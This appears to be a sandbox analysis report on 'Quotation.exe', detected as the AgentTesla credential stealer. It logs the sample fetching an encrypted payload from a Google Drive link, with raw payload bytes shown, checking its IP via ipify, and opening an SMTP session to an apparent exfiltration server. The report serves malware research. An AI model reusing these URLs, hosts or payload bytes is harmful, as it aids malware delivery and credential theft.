                                                              2024-11-04 09:00:27 UTC216OUTGET /uc?export=download&id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              2024-11-04 09:00:28 UTC1610INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Mon, 04 Nov 2024 09:00:28 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-GaPg9xPEXf1kDz-t9sICEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549773142.250.185.974432284C:\Users\user\Desktop\Quotation.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-04 09:00:29 UTC258OUTGET /download?id=1JtejAXTm-04H2_VGdyQPa2y9ROwwzcu6&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              2024-11-04 09:00:31 UTC4925INHTTP/1.1 200 OK
                                                              Content-Type: application/octet-stream
                                                              Content-Security-Policy: sandbox
                                                              Content-Security-Policy: default-src 'none'
                                                              Content-Security-Policy: frame-ancestors 'none'
                                                              X-Content-Security-Policy: sandbox
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Cross-Origin-Embedder-Policy: require-corp
                                                              Cross-Origin-Resource-Policy: same-site
                                                              X-Content-Type-Options: nosniff
                                                              Content-Disposition: attachment; filename="WtKJYNjGsumPYqqm240.bin"
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: false
                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                              Accept-Ranges: bytes
                                                              Content-Length: 240192
                                                              Last-Modified: Fri, 01 Nov 2024 07:38:28 GMT
                                                              X-GUploader-UploadID: AHmUCY1xMiElQZ1Kk1X3uNuPD5nKyWYyzQHP7EP7dT4WRCsb8QSGGPJJLLIzXevfNXnifjaf9uDOjB2-cw
                                                              Date: Mon, 04 Nov 2024 09:00:31 GMT
                                                              Expires: Mon, 04 Nov 2024 09:00:31 GMT
                                                              Cache-Control: private, max-age=0
                                                              X-Goog-Hash: crc32c=LFTVKA==
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close
                                                              2024-11-04 09:00:31 UTC4925INData Raw: b0 14 b4 cb 85 d3 05 84 7c 41 25 b7 dc 9f 3b 4b 3b 91 bc 06 05 fd 94 87 dc d4 f6 07 c3 23 9d c1 38 45 45 f7 9d 0e 60 29 00 1f 4c 50 38 04 da 53 a0 60 e6 c8 4d 42 a1 7b 8b 57 3e a3 69 7d 5d 37 da a9 93 dc 7b 6c 7c c9 56 cf 21 0e 99 62 ff 8e 9b 55 fd 96 e8 16 bb da 43 41 74 a2 4b 52 0d 14 7e fd 9b 71 9b 1c 8b b3 23 cd db 30 3e 37 45 35 ff f7 95 df 6d 8d 8b 38 ae 8d 2c 5b 46 81 25 5e ed 3a 3f 09 2f 05 ff 53 f1 06 1b 2b 48 22 05 e8 1b 18 6f 41 6c cf 06 c5 d5 89 23 9f 65 98 7e a1 8c 40 b7 98 ad 82 b8 c9 68 24 a1 64 91 c5 12 c5 1d 0b 35 16 17 fb 1b 24 27 8a b4 68 49 fa 3d 3f 08 cf dc fb 19 0e e3 87 a5 57 68 d7 02 aa fe 0b 97 d6 fb 05 55 d8 91 af 0a 6d 6f 99 a3 ec 80 6a 53 94 91 72 5b e2 18 4e e2 98 7f 3c a4 2f 22 85 d6 bd f1 03 44 e0 ef d6 dc d0 d0 73 ed 98 b4
                                                              Data Ascii: |A%;K;#8EE`)LP8S`MB{W>i}]7{l|V!bUCAtKR~q#0>7E5m8,[F%^:?/S+H"oAl#e~@h$d5$'hI=?WhUmojSr[N</"Ds
                                                              2024-11-04 09:00:31 UTC4851INData Raw: e4 43 04 da 69 70 65 d0 e7 e8 57 a7 dc 43 c2 60 66 2a 24 48 bc 85 a9 66 c2 c1 7a f4 ec de 60 76 11 52 13 d4 04 eb ee 67 ff 56 ca 58 60 7c 93 db b9 6e b4 57 89 83 2f 3b 8e 45 bd ef fc 81 e1 c1 8c df bf 76 61 59 8f aa b4 f9 e1 5f b8 25 7d 63 4a 40 bb 49 1e d6 e2 b5 6c 26 9b 65 cd 47 1b 49 56 62 72 e7 d8 a3 77 e8 a3 5c 16 a5 c8 77 6b 2f da ec ac b0 4e f5 52 3c cd bf 67 ae f5 77 58 e3 97 ea 86 6e 66 e4 f6 94 3c 8c 6f 07 3f f5 f5 54 9a 05 2e 9e 4d 88 41 ca e2 1f 78 33 12 d0 00 44 b7 53 6f 51 5b 30 83 b2 53 4f d2 1f 07 33 25 cb 61 a0 d5 00 3b 02 7c d1 b8 6b 62 18 c8 99 15 b3 c2 1c fc e1 88 c2 2d a4 7d 70 a8 ed c2 80 d8 b5 0d de b1 95 09 3a 82 97 11 ea fb fe d8 af 62 7f f5 e3 ba 9e c3 2e c4 bf 27 54 af 2b ce 03 b4 c8 35 a8 26 fb f8 8c 33 d4 2a e9 22 1c cb 91 38
                                                              Data Ascii: CipeWC`f*$Hfz`vRgVX`|nW/;EvaY_%}cJ@Il&eGIVbrw\wk/NR<gwXnf<o?T.MAx3DSoQ[0SO3%a;|kb-}p:b.'T+5&3*"8
                                                              2024-11-04 09:00:31 UTC1322INData Raw: b6 15 12 1f dc 1a e7 0b ba 49 0b 69 04 a7 07 3e 55 f5 62 77 23 a3 45 93 28 64 fc fb a2 81 99 b2 0f 16 96 8c 2c 33 49 ce 04 75 c5 ec 97 5f 5a f1 a7 6a 2f 66 06 ae f6 27 d2 04 b0 9a 33 1a 30 33 93 35 8d bf 5f 28 90 c8 80 3c 13 1a 77 f4 ef 38 67 97 25 3e 7f 23 79 3b ba c2 57 f4 dd 3a 19 87 f3 03 dc 12 34 54 89 52 cf 2b f0 68 99 ff ae 26 55 fd 96 16 18 b7 da 03 bf 78 ae 4b 72 19 14 7e fd 65 70 a2 07 8b b3 23 33 d7 34 3e 1f 7b 35 ff fd 19 9b 6d 8d 8a c6 a0 8d 2c 7b d3 81 25 5e 1d 2b 89 07 2f 4f fa 92 d0 9e 13 67 85 03 af 81 4b 7d 4f 31 1e 5e 6d b2 b4 cc 42 fc 04 fc ee c0 f8 60 f5 f7 8d f0 cd 59 46 41 cf 44 2b 86 4d e5 50 67 51 73 39 08 17 17 19 8a b4 68 b7 f6 3f 3f a6 86 dd fb 3a 4d e0 87 33 6c 0c b2 02 8a fa 0b 97 d6 05 0b b9 d8 93 50 0d 60 64 b9 83 4c 83 6a
                                                              Data Ascii: Ii>Ubw#E(d,3Iu_Zj/f'3035_(<w8g%>#y;W:4TR+h&UxKr~ep#34>{5m,{%^+/OgK}O1^mB`YFAD+MPgQs9h??:M3lP`dLj
                                                              2024-11-04 09:00:31 UTC1378INData Raw: a6 31 0c f6 c9 41 e4 d4 1f fb 8b 55 cd 54 26 9a 78 bf 82 c2 c3 b1 78 38 9b 9e 88 96 f7 85 16 a1 4c c6 63 a6 4b 2f 7f 2b a8 e7 dd 2f 8f 14 16 8f 12 91 1e 13 39 da 15 12 c1 39 76 6b 60 bc 87 78 87 25 2e 86 0e 45 be 62 88 db 06 84 dd e5 98 b6 35 14 e1 dd 23 17 0a 83 4c 33 aa 06 9f 02 1e 4f f5 5a 81 23 52 b6 b9 28 9a f0 e4 92 a2 8b ab 0e 16 68 85 15 28 58 ee 04 8b c9 e8 69 79 67 f1 9f 65 a2 22 06 ae 09 d5 df 04 90 bf 20 1a 30 cd 6c 02 97 bf 5f d6 62 c8 80 1c e9 16 76 f4 51 23 5e b5 25 1e 79 dd 73 3b 44 e4 6b f4 dd ce 35 94 f3 23 de 78 6c 7c 37 53 f6 30 0e 66 9d 01 82 23 55 03 98 e9 16 9b d9 03 41 74 5c 45 51 0d 14 80 f1 98 71 bb 18 8b b3 23 33 da 09 1d 37 45 35 01 fe 95 df 11 ee 8b 38 aa 73 20 59 c6 7f 29 5f e3 0d 87 07 2f 9a 08 90 d0 be 3a 62 85 03 51 7e 7c
                                                              Data Ascii: 1AUT&xx8LcK/+/99vk`x%.Eb5#L3OZ#R(h(Xiyge" 0l_bvQ#^%ys;Dk5#xl|7S0f#UAt\EQq#37E58s Y)_/:bQ~|
                                                              2024-11-04 09:00:31 UTC1378INData Raw: b0 7c 9e 59 99 54 85 cd ea a4 6d 41 3d 1e 84 c6 29 c7 50 41 4f 27 cd 86 cb 00 f5 c9 9f ee d7 1f fb 8b 58 f7 5a 06 9f 78 87 0d 3c c2 88 4e 3d 9b 9e 76 64 f9 86 e8 ad b3 ca 20 07 94 d8 80 0b ae 19 dc 16 7f 1a 15 8f 2a 1f 12 10 39 da 1c 12 c1 39 76 64 5a b6 87 86 8b 26 0e a7 05 45 be 9c 78 d9 3f a4 23 e9 9b 48 1c 12 e1 a6 47 e9 0b be b7 3e ab 06 dc 60 1e 4f f1 0d 4c dd ad 4f b3 24 9a f0 f7 5c af 88 b2 0f e8 64 8e 15 08 49 ce 04 8b 37 e9 ae 7d 64 f1 a7 60 83 23 06 ae f7 27 d2 07 b0 ba de 16 33 33 4d 37 81 bf 5f 28 9d fd 85 1c 17 1a 4f f1 11 39 5e 8d fb c3 80 22 0d 77 ba ea 62 0a d4 31 39 69 fa 01 dc 86 65 7f c9 7a fc 21 0e 60 b7 ff 95 13 50 fd 86 e9 16 bb d1 03 41 65 82 4b 52 0d 14 80 f3 98 71 a3 6f 8b b3 23 cd 25 3c 3d 37 65 37 ff f7 95 21 6c b4 85 38 ae 8d
                                                              Data Ascii: |YTmA=)PAO'XZx<N=vd *99vdZ&Ex?#HG>`OLO$\dI7}d`#'33M7_(O9^"wb19iez!`PAeKRqo#%<=7e7!l8
                                                              2024-11-04 09:00:31 UTC1378INData Raw: 64 b5 68 d6 84 ff b1 a4 af c4 e5 0d 2d f9 a7 f8 53 eb 3b 57 7a d3 f9 4e 55 9b 59 b9 54 7b cc d3 9e c3 41 3d 26 a1 c4 29 c7 68 ed be db 32 ac 35 0c f6 d2 8f e8 d7 ff fb 75 59 c2 54 06 8e 58 bf 82 3c c2 76 60 3a 9b a6 f7 9a f7 85 e8 53 41 c4 23 27 b5 d0 80 0b 50 e6 e4 33 71 1a 15 71 1b 6f 12 6b 4d fa 15 16 e9 65 88 6a 53 8c 2a 78 87 25 2e 85 0e 45 be 62 88 da 06 84 dd e5 99 b6 35 10 e1 dd 23 17 0a 83 5b 33 aa 06 87 07 1e 4f f5 9c 79 dd ad 69 90 28 9a f0 09 ac a3 8b b2 f1 1a 6a 8d 35 28 49 ce 04 75 c8 d1 9d 77 64 f1 a7 40 a2 22 06 ae 09 d7 de 04 b0 44 2c 18 30 13 6e 3b 81 bf a1 d7 a5 c1 80 1c 17 22 72 f4 11 39 66 cf da c1 80 23 7a 3b ba 91 1d f4 dd 34 1c 69 fd 02 dc 86 61 7c c9 7a 92 21 0e 6c 63 f6 8e 23 2e 89 96 e8 12 93 dc 03 41 72 5c 42 52 0d 66 45 ff 9b
                                                              Data Ascii: dh-S;WzNUYT{A=&)h25uYTX<v`:SA#'P3qqokMejS*x%.Eb5#[3Oyi(j5(Iuwd@"D,0n;"r9f#z;4ia|z!lc#.Ar\BRfE
                                                              2024-11-04 09:00:31 UTC1378INData Raw: 19 68 0c c3 7e 27 45 6a 05 d5 76 39 4a da 25 f1 d4 b3 79 ce 9e fa 26 64 b5 9c aa c9 f5 b1 a0 8f 85 c5 0c 2d 07 a9 06 5d eb c5 5b 84 df d9 4c 75 9f 59 47 55 bc df ea 9b c3 bf 34 1e a4 ec 64 c7 50 b9 61 27 cd 86 35 f2 f8 c9 bf ea 29 13 fb 75 79 c7 54 06 9f 86 be bb 1f c2 88 6e c6 92 9e 76 b2 b2 85 e8 ab b3 cf 22 07 94 a3 80 0b ae 19 dc 70 48 17 17 8f 12 4f 18 10 39 fa eb 1c c1 39 88 94 55 b6 87 58 90 25 0e 87 f0 44 87 96 86 d8 06 ae 03 f1 9b b6 15 ec ef dd 23 e9 f5 b6 49 33 8a 4c a7 07 1e b1 f4 5b 7d dd ad 49 b9 08 d1 f0 f7 a2 5f 85 b2 0f 16 96 81 15 28 69 af 04 8b c9 16 96 4e 46 f1 a7 60 5d 2b 06 ae d2 a2 a8 04 b0 be 52 96 34 33 1d 13 9a bf 5f dc e1 b0 80 1c 13 3a 15 f4 11 39 a0 bb 25 3e 7f 23 7f 3b ba ca 5a f4 dd 30 c7 96 ca 09 dc 78 6c 56 e9 61 cf 21 0e
                                                              Data Ascii: h~'Ejv9J%y&d-][LuYGU4dPa'5)uyTnv"pHO99UX%D#I3L[}I_(iNF`]+R43_:9%>#;Z0xlVa!
                                                              2024-11-04 09:00:31 UTC1378INData Raw: 20 79 d1 66 d2 5e 52 5f ef 66 bd fb 21 b4 38 dc 4e 5f 3d 6b 03 2f 5e 11 51 2e e6 05 53 bb 63 01 a7 81 46 3e aa 0d ee a6 31 77 b3 9a d2 3d 60 95 82 d7 bd f5 4f aa af c4 c5 f2 21 f9 a7 26 61 eb 3b 57 7a de c0 59 75 9f 59 47 5d 84 cd ca eb c3 41 3d 5e cf 39 d6 38 70 82 41 24 cd 78 3b 0c f6 c9 41 e6 d7 1f db 7d 59 ce 54 f8 9e 41 b5 82 3c c2 a2 4e 31 9b 9e 76 64 f9 85 e8 ad b3 ca 23 07 94 e9 80 0b ae 19 dc 16 66 1a 15 8f ec 66 13 10 19 f7 15 12 c1 79 27 95 a6 49 a7 42 87 25 0e 79 00 45 be 9c 78 d4 06 84 03 cc 9b b6 15 ec e0 e4 01 e9 0b ba b7 3a aa 06 82 7c 6a 4f f5 66 05 03 a9 49 e3 00 81 f0 f7 a8 dc ff b2 0f 12 48 ab 15 28 49 30 0a 8b c9 e8 69 7b 64 f1 87 4b a3 22 06 50 f6 e0 fe 04 b0 ba de 13 30 33 48 40 f5 bf 5f d2 ee 2e 84 1c 67 32 6c f4 11 33 23 c1 25 3e
                                                              Data Ascii: yf^R_f!8N_=k/^Q.ScF>1w=`O!&a;WzYuYG]A=^98pA$x;A}YTA<N1vd#ffy'IB%yEx:|jOfIH(I0i{dK"P03H@_.g2l3#%>
                                                              2024-11-04 09:00:31 UTC1378INData Raw: eb c1 7d 67 03 53 eb 56 1a 25 ac ae cc 72 31 1e 4c 8b 66 44 f1 4f 07 2b 87 df 66 2c 5f 95 59 ef 66 9d c2 01 b8 38 22 4f 98 11 6b 03 2f 5e 14 51 2e e3 2c 27 bb 63 fb d4 6a 60 3e da 25 0b af 31 7d eb 95 a6 3d 64 b1 e4 5d b8 f5 c1 8c b4 c4 c5 06 50 8d a7 06 59 cb 68 57 84 df 07 40 75 9f 59 47 58 85 cd ca 91 c3 41 3d e0 a5 fd 0b c7 50 bf bf 2d cd 86 10 77 82 c9 bf ee a5 8b fe 75 29 e6 4f 06 9f 72 c2 f6 3c c2 8c 4e 33 9b 9e 76 64 f9 85 e8 ad b3 ca 23 07 94 dd 80 0b ae 19 dc 16 53 1a 15 8f ec 66 12 10 1c 81 61 12 c1 3d fa cc 5c b6 f7 50 9c 25 0e 8d 73 31 be 9c 82 f8 08 84 23 e9 65 b8 15 12 e1 23 2f e9 0b 9a 4a 33 aa 06 59 06 27 58 f5 62 77 23 a4 48 93 08 92 f0 f7 a2 e1 47 45 f0 e9 48 89 15 28 49 30 0a 8b c9 e8 69 7b 64 f1 87 28 a3 22 06 50 f6 e0 cb 04 b0 ba de
                                                              Data Ascii: }gSV%r1LfDO+f,_Yf8"Ok/^Q.,'cj`>%1}=d]PYhW@uYGXA=P-wu)Or<N3vd#Sfa=\P%s1#e#/J3Y'Xbw#HGEH(I0i{d("P
                                                              2024-11-04 09:00:31 UTC1378INData Raw: 01 b8 bc 6a 6c ce 87 78 49 0b bf 5f 32 39 b3 34 6a 83 7d 09 75 58 43 eb c1 89 14 77 53 eb ac 36 1d ac 8e a1 8c 3f 1e b2 8a a1 42 f1 4f 27 0a a7 b1 66 d2 5e 52 5d ef 66 9d 16 2d b4 38 02 1e 66 1f 6b fd 2e 99 0f 51 2e c3 80 2e ba 63 25 a2 53 42 3e 9a fb 04 59 ce 5d 9c ee d2 3d 9a bb 96 d7 bd 0b bd a4 af e4 f1 0c 2d f9 59 07 64 c9 3b 57 84 21 f0 4e 75 ba 22 cd 54 85 c9 98 a9 c5 41 4d 36 bf c4 29 cd 2d cb 41 24 c9 a6 00 0c f6 c9 41 e4 d7 1f fb 8b 55 ce 54 26 c6 78 bf 82 c2 c3 b1 64 38 9b 9e 5c ba ad 85 e8 ad b3 c8 23 07 b4 2e 8c 0b ae c7 fe 2f 71 1a eb 8e 2b 65 12 10 39 d0 35 36 c1 39 88 94 57 b6 87 78 79 29 0e 87 2e 5d be 9c 86 26 07 bd 34 e9 9b b6 eb 1b e0 dd 03 cf 0b ba 49 73 9d f1 58 f8 3e 56 f5 62 77 23 a3 49 93 28 64 fc f7 a2 81 fa b2 0f 16 96 8c 2c 07
                                                              Data Ascii: jlxI_294j}uXCwS6?BO'f^R]f-8fk.Q..c%SB>Y]=-Yd;W!Nu"TAM6)-A$AUT&xd8\#./q+e9569Wxy).]&4IsX>Vbw#I(d,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549802104.26.13.2054432284C:\Users\user\Desktop\Quotation.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-04 09:00:33 UTC155OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                              Host: api.ipify.org
                                                              Connection: Keep-Alive
                                                              2024-11-04 09:00:34 UTC399INHTTP/1.1 200 OK
                                                              Date: Mon, 04 Nov 2024 09:00:34 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 14
                                                              Connection: close
                                                              Vary: Origin
                                                              cf-cache-status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 8dd36a189f5f6b4b-DFW
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1990&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=1445109&cwnd=251&unsent_bytes=0&cid=ca77278fac089279&ts=193&x=0"
                                                              2024-11-04 09:00:34 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                                              Data Ascii: 173.254.250.69


                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Nov 4, 2024 10:00:36.501033068 CET5874981567.23.226.139192.168.2.5220-super.nseasy.com ESMTP Exim 4.96.2 #2 Mon, 04 Nov 2024 04:00:36 -0500
                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                              220 and/or bulk e-mail.
                                                              Nov 4, 2024 10:00:36.501220942 CET49815587192.168.2.567.23.226.139EHLO 745773
                                                              Nov 4, 2024 10:00:37.581612110 CET5874981567.23.226.139192.168.2.5250-super.nseasy.com Hello 745773 [173.254.250.69]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-STARTTLS
                                                              250 HELP
                                                              Nov 4, 2024 10:00:37.581650972 CET5874981567.23.226.139192.168.2.5250-super.nseasy.com Hello 745773 [173.254.250.69]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-STARTTLS
                                                              250 HELP
                                                              Nov 4, 2024 10:00:37.581680059 CET5874981567.23.226.139192.168.2.5250-super.nseasy.com Hello 745773 [173.254.250.69]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-STARTTLS
                                                              250 HELP
                                                              Nov 4, 2024 10:00:37.581854105 CET49815587192.168.2.567.23.226.139STARTTLS
                                                              Nov 4, 2024 10:00:37.582514048 CET5874981567.23.226.139192.168.2.5250-super.nseasy.com Hello 745773 [173.254.250.69]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-STARTTLS
                                                              250 HELP
                                                              Nov 4, 2024 10:00:37.739248991 CET5874981567.23.226.139192.168.2.5220 TLS go ahead

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:03:59:52
                                                              Start date:04/11/2024
                                                              Path:C:\Users\user\Desktop\Quotation.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                              Imagebase:0x400000
                                                              File size:1'208'728 bytes
                                                              MD5 hash:9ED064F0FEB2397BB999563751C20B92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:04:00:15
                                                              Start date:04/11/2024
                                                              Path:C:\Users\user\Desktop\Quotation.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                              Imagebase:0x400000
                                                              File size:1'208'728 bytes
                                                              MD5 hash:9ED064F0FEB2397BB999563751C20B92
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3293340440.0000000033D44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3293340440.0000000033D3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3293340440.0000000033D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:30.4%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:16.4%
                                                                Total number of Nodes:827
                                                                Total number of Limit Nodes:18
                                                                execution_graph 3281 733f2ebf 3282 733f2ed7 3281->3282 3283 733f1309 2 API calls 3282->3283 3284 733f2ef2 3283->3284 2806 733f167a 2807 733f16b7 2806->2807 2848 733f2351 2807->2848 2809 733f16be 2810 733f17ef 2809->2810 2811 733f16cf 2809->2811 2812 733f16d6 2809->2812 2894 733f1fcb 2811->2894 2878 733f2049 2812->2878 2817 733f1722 2907 733f2209 2817->2907 2818 733f1740 2822 733f1746 2818->2822 2823 733f1791 2818->2823 2819 733f16eb 2827 733f16f5 2819->2827 2828 733f1702 2819->2828 2820 733f170a 2832 733f1700 2820->2832 2904 733f2f9f 2820->2904 2926 733f1f1e 2822->2926 2825 733f2209 10 API calls 2823->2825 2833 733f177e 2825->2833 2826 733f1728 2918 733f1668 2826->2918 2827->2832 2888 733f2d14 2827->2888 2898 733f17f7 2828->2898 2832->2817 2832->2818 2839 733f17de 2833->2839 2931 733f200d 2833->2931 2836 733f2209 10 API calls 2836->2833 2838 733f1708 2838->2832 2839->2810 2841 733f17e8 GlobalFree 2839->2841 2841->2810 2845 733f17cf 2845->2839 2935 733f15c5 wsprintfW 2845->2935 2846 733f17c2 FreeLibrary 2846->2845 2938 733f12f8 GlobalAlloc 2848->2938 2850 733f237f 2939 733f12f8 GlobalAlloc 2850->2939 2852 733f2a3a GlobalFree GlobalFree GlobalFree 2853 733f2a5a 2852->2853 2868 733f2aa7 2852->2868 2854 733f2af7 2853->2854 2862 733f2a73 2853->2862 2853->2868 2855 733f2b19 GetModuleHandleW 2854->2855 2854->2868 2857 733f2b3f 2855->2857 2858 733f2b2a LoadLibraryW 2855->2858 2856 733f2947 GlobalAlloc 2872 733f238a 2856->2872 2946 733f1f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2857->2946 2858->2857 2858->2868 2860 733f299f lstrcpyW 2860->2872 2861 733f29bd GlobalFree 2861->2872 2865 733f12e1 2 API calls 2862->2865 2862->2868 2863 733f2b8e 2864 733f2b9c lstrlenW 2863->2864 2863->2868 2947 733f1f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2864->2947 2865->2868 2866 733f29af lstrcpyW 2866->2872 2868->2809 2869 733f2b4c 2869->2863 2876 733f2b78 GetProcAddress 2869->2876 2870 733f2bb6 2870->2868 2872->2852 2872->2856 2872->2860 2872->2861 2872->2866 2873 733f2822 GlobalFree 2872->2873 2875 733f29fb 2872->2875 2940 733f12f8 GlobalAlloc 2872->2940 2941 733f12e1 2872->2941 2873->2872 2875->2872 2944 733f1309 GlobalSize GlobalAlloc 2875->2944 2876->2863 2881 733f205e 2878->2881 2879 733f208b 2879->2881 2884 733f21be GlobalFree 2879->2884 2949 733f1548 2879->2949 2954 733f19db 2879->2954 2881->2879 2882 733f2124 GlobalAlloc WideCharToMultiByte 2881->2882 2883 733f2154 GlobalAlloc CLSIDFromString 2881->2883 2881->2884 2886 733f12e1 lstrcpynW GlobalAlloc 2881->2886 2882->2884 2883->2881 2884->2881 2885 733f16dc 2884->2885 2885->2819 2885->2820 2885->2832 2886->2881 2889 733f2d26 2888->2889 2890 733f2dcb ReadFile 2889->2890 2893 733f2de9 2890->2893 2957 733f2cbf 2893->2957 2895 733f1fde 2894->2895 2896 733f1fe9 GlobalAlloc 2895->2896 2897 733f16d5 2895->2897 2896->2895 2897->2812 2902 733f1823 2898->2902 2899 733f18a8 2901 733f18ac GlobalSize 2899->2901 2903 733f18b5 2899->2903 2900 733f1897 GlobalAlloc 2900->2903 2901->2903 2902->2899 2902->2900 2903->2838 2905 733f2faa 2904->2905 2906 733f2fea GlobalFree 2905->2906 2960 733f12f8 GlobalAlloc 2907->2960 2909 733f22b7 lstrcpynW 2915 733f2211 2909->2915 2910 733f22a6 StringFromGUID2 2910->2915 2911 733f2280 MultiByteToWideChar 2911->2915 2912 733f22ca wsprintfW 2912->2915 2913 733f22ee GlobalFree 2913->2915 2914 733f2325 GlobalFree 2914->2826 2915->2909 2915->2910 2915->2911 2915->2912 2915->2913 2915->2914 2916 733f15eb 2 API calls 2915->2916 2961 733f1638 2915->2961 2916->2915 2965 733f12f8 GlobalAlloc 2918->2965 2920 733f166d 2921 733f1f1e 2 API calls 2920->2921 2922 733f1677 2921->2922 2923 733f15eb 2922->2923 2924 733f15f4 GlobalAlloc lstrcpynW 2923->2924 2925 733f1633 GlobalFree 2923->2925 2924->2925 2925->2833 2927 733f1f5c 